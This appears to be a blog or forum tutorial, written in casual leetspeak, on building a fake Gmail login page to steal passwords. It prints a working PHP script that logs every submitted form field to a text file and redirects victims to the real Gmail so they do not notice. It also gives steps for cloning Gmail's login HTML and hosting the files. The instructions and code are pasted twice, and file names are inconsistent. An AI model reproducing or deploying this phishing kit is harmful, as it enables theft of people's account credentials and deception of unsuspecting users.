Hey awl :) In diz tut i will be telling uhh all about gmail phishing as i tod about facebook phishing in mah last tut :D
so here we go
so here we go
Things Required
- .html file
- .php file
- .txt file
Step 1--> Creating .html File
For that firstly go to www.gmail.com (make sure that the page is loaded completely) and right click and select view source ( in firefox ) or view source code option in other browsers.
After that select all ( CTR + A ) and copy all the code and paste it in notepad.
and then search for the code action="https://www.google.com/accounts/ServiceLoginAuth" method="post";
and Just change the above code as action="gmail.php" method="post";
after changing that to gmail.php (name mentioned in d above code ) just save it in the form login.html ( anyname.html ).
Step 2--> Creating .php File
now for creating a php script,just copy the below php code into notepad and save in the format mail.php ( or anything.php)
<?php
header ('Location: http://www.gmail.com ');
$handle = fopen("pass.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Step 3--> Creating .txt File
Now create a .Txt file with name pass.txt ( name mentioned in php script )
Step 4--> Now host these three file(.txt,.html.php) is any web-hosting site that supports php :)
Now once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.
Now whoever will try to login for Gmail through your Fake page, his/her Username and Password will be automatically saved in Password.txt file as plain text which you can view easily. Also the the victim won't have a hint that he/she has been hacked since, he/she will be redirected to the original Gmail page and will get a feel as if he/she entered a wrong password by mistake.
For that firstly go to www.gmail.com (make sure that the page is loaded completely) and right click and select view source ( in firefox ) or view source code option in other browsers.
After that select all ( CTR + A ) and copy all the code and paste it in notepad.
and then search for the code action="https://www.google.com/accounts/ServiceLoginAuth" method="post";
and Just change the above code as action="gmail.php" method="post";
after changing that to gmail.php (name mentioned in d above code ) just save it in the form login.html ( anyname.html ).
Step 2--> Creating .php File
now for creating a php script,just copy the below php code into notepad and save in the format mail.php ( or anything.php)
<?php
header ('Location: http://www.gmail.com ');
$handle = fopen("pass.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Step 3--> Creating .txt File
Now create a .Txt file with name pass.txt ( name mentioned in php script )
Step 4--> Now host these three file(.txt,.html.php) is any web-hosting site that supports php :)
Now once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.
Now whoever will try to login for Gmail through your Fake page, his/her Username and Password will be automatically saved in Password.txt file as plain text which you can view easily. Also the the victim won't have a hint that he/she has been hacked since, he/she will be redirected to the original Gmail page and will get a feel as if he/she entered a wrong password by mistake.
0 comments:
Post a Comment
Got any doubts or feedbacks ?
Feel free to comment !